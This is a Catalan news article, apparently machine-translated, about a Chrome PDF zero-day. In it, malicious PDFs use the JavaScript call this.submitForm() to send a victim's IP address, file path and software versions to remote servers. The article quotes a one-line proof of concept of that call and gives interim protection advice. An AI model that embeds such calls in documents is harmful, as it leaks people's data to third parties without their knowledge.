Servei de detecció d'explotació EdgeSpot va descobrir una intrigant vulnerabilitat de Chrome zero dies que explotava documents PDF. La vulnerabilitat permet als atacants recollir dades sensibles mitjançant documents PDF maliciosos oberts a Chrome.

Tan bon punt la víctima obre els respectius fitxers PDF a Google Chrome, un programa maliciós comença a funcionar en segon pla recopilant dades de l'usuari.

A continuació, les dades es reenvien al servidor remot que estan controlats pels pirates informàtics. Potser us pregunteu quines dades xuclen els atacants, orienten les dades següents al vostre PC:

• adreça IP
• Ruta completa del fitxer PDF del sistema
• Versions de SO i Chrome

Aneu amb compte dels fitxers PDF publicats per programari maliciós

Us hauria sorprès que no passi res quan s’utilitza Adobe Reader per obrir fitxers PDF. A més, s’utilitzen peticions HTTP POST per transferir dades als servidors remots sense cap intervenció de l’usuari.

Els experts van veure que un dels dos dominis readnotifycom o burpcollaboratornet estava rebent les dades.

Us podeu imaginar la intensitat de l’atac tenint en compte que la majoria del programari antivirus no és capaç de detectar les mostres detectades per EdgeSpot.

Els experts revelen que els atacants utilitzen l'API de Javascript PDF "this.submitForm ()" per recopilar la informació sensible dels usuaris.

La vam provar amb un PoC mínim, una simple trucada a l'API com "this.submitForm (" http://google.com/test ")" farà que Google Chrome enviï les dades personals a google.com.

Els experts van saber que aquest error de Chrome estava sent explotat per dos conjunts diferents de fitxers PDF maliciosos. Tots dos van ser circulats a l’octubre del 2017 i al setembre del 2018, respectivament.

En particular, les dades recollides poden ser utilitzades pels atacants per afinar atacs en el futur. Els informes suggereixen que el primer lot de fitxers es va compilar mitjançant el servei de seguiment PDF de ReadNotify.

Els usuaris poden utilitzar el servei per fer un seguiment de les visualitzacions dels usuaris. EdgeSpot no ha compartit cap detall sobre la naturalesa del segon conjunt de fitxers PDF.

Com mantenir-se protegit

El servei de detecció d’explotació EdgeSpot volia alertar els usuaris de Chrome sobre els possibles riscos, ja que no s’espera que el pegat es publiqui en un futur proper.

EdgeSpot va informar a Google sobre la vulnerabilitat de l'any passat i la companyia va prometre llançar un pegat a finals d'abril. H

Deus, podeu considerar l'ús d'una solució temporal al problema si visualitzeu localment els documents PDF rebuts mitjançant una aplicació de lector de PDF alternativa.

De forma alternativa, també podeu obrir els vostres documents PDF a Chrome desconnectant els sistemes d’Internet. Mentrestant, podeu esperar a l’actualització de Chrome 74 que es preveu que es publiqui el 23 d’abril.